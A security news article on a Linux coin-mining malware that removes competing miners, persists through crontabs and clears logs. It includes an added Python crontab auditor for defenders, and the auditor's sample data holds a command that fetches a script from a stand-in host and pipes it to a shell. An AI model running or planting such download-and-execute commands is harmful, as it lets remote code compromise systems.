Cryptocurrency miner removes other malware in bid to make more money

News by Rene Millman

Malware targets Linux machines and removes competing cryptocurrency miners and malware which would slow down the machine, researchers say.


Malware has been discovered that infects Linux systems to install a cryptocurrency miner while also removing other malware and coinminers present on the system.

According to a blog post by security researchers at Trend Micro, the malware installs the XMR-Stak Cryptonight cryptocurrency miner. They also found a script capable of deleting a number of known Linux malware families and coin miners, and of killing connections to other miner services and ports.

The coinminer shares some code with the Xbash malware and is closely related to the Korkerds cryptocurrency miner. The code installs cryptocurrency-mining malware and implants itself into the system and crontabs so that it persists across reboots and deletions.

According to Trend Micro, the infection’s second stage starts from some IP cameras and web services via TCP port 8161, where the attacker tries to upload a crontab file.

It also downloads a crontab that downloads and runs shell script 1.jpg, enabling three functions named and identified by the attackers.

Function B kills previously installed malware, coin miners and all related services referenced to an accompanying malware (detected by Trend Micro as Trojan.SH.MALXMR.UWEIU). It also creates new directories and files, and stops processes with connections to identified IP addresses.

Function D downloads the coin miner binary from hxxp:// and runs it.

Function C downloads a script from hxxp://, saves it to /usr/local/bin/dns file, and creates a new crontab to call this script at 1am. It also downloads hxxp:// and puts it in different crontabs.

The malware then clears system logs in a bid to cover its tracks.
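The crontab persistence described above can be hunted for on a Linux host. The following is an added example, not code from Trend Micro or from the malware: it audits crontab lines for a download piped to a shell, a fetched file with an image extension (like 1.jpg), and a job that runs /usr/local/bin/dns. The regular expressions, function names and sample lines are assumptions constructed for illustration.

```python
import re

# Indicators based on the behaviour the article describes; the patterns are assumptions.
FETCH = re.compile(r"\b(curl|wget)\b", re.I)
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|da|z)?sh\b")
DISGUISED = re.compile(r"\.(jpe?g|png|gif)\b", re.I)  # script served as an "image"
DROPPED_PATH = "/usr/local/bin/dns"  # path named in the article; review, not proof

def split_entry(line):
    """Return (schedule, command), or None for comments, blanks and env lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith("@"):  # @reboot, @daily, ...
        parts = line.split(None, 1)
        return (parts[0], parts[1]) if len(parts) == 2 else None
    parts = line.split(None, 5)
    if len(parts) < 6 or not re.fullmatch(r"[\d*/,\-]+", parts[0]):
        return None
    # In /etc/crontab and /etc/cron.d the command starts with a user field.
    return " ".join(parts[:5]), parts[5]

def audit(lines):
    """Return [(line_number, schedule, [reasons])] for suspicious entries."""
    findings = []
    for n, line in enumerate(lines, 1):
        entry = split_entry(line)
        if entry is None:
            continue
        schedule, cmd = entry
        reasons = []
        if FETCH.search(cmd) and PIPE_TO_SHELL.search(cmd):
            reasons.append("download piped to shell")
        if FETCH.search(cmd) and DISGUISED.search(cmd):
            reasons.append("fetches file with image extension")
        if DROPPED_PATH in cmd:
            reasons.append("runs " + DROPPED_PATH)
        if reasons:
            findings.append((n, schedule, reasons))
    return findings

SAMPLE = [  # constructed crontab content, not taken from a real infection
    "# m h dom mon dow command",
    "MAILTO=root",
    "*/10 * * * * curl -fsSL http://malicious.example/1.jpg | sh",
    "0 1 * * * /usr/local/bin/dns",
    "30 2 * * * /usr/bin/rsync -a /srv/data /backup",
    "15 3 * * 0 wget -q https://mirror.example/pkg.tar.gz -O /tmp/pkg.tar.gz",
]

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```

On a real host, feed it the output of `crontab -l` for each user and the files under /etc/cron.d and /var/spool/cron.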

Security researchers added that when compared to a Korkerds sample, this script simplifies the routine to downloading and executing the files, followed by installing the coinminer into the system.

"Looking into its propagation routine, a majority of the codes were also taken from the KORKERDS script, as the codes are still available online with Base64 encoding via hxxps:// We noted the subtle difference in the absence of the link placed in between the PUT URL /fileserver/vMROB4ZhfLTljleL and the actual crontab," said researchers.

The new script inserts just one crontab that fetches all the code and the miner, compared with Korkerds, which saves the crontab directly.

Researchers said that removing competing malware is just one way cyber-criminals are maximising their profit.

"Enterprises can protect themselves from various kinds of evolving attacks by making sure their systems have downloaded the latest patches released by legitimate vendors. Cryptocurrency-mining malware or coin miners use CPU and GPU resources, making systems run slowly," said researchers.

Despite removing other coinminers and malware, this new threat should not be seen as benign.

Naaman Hart, managed security services engineer at Digital Guardian, told SC Media UK that it’s never worth letting one piece of malware exist even if it has tangible benefits.  

"It’s the equivalent of taking a vaccination off someone in the pub. It may have benefits, sure, but it might also carry something far more dangerous hidden within it. Removing all malware is the best policy," he said.

Paul Ducklin, senior technologist at Sophos, told SC that sometimes it's an excuse that lets a malware writer claim to be 'doing some good' – "a bit like beating someone up but claiming you're a humanitarian because you called an ambulance before running away – and sometimes, as in this case, it's criminal competition, plain and simple. The more CPU power a coinminer gets, the more mining it can do, so killing another cybergang's malware helps the crooks increase their earnings." 
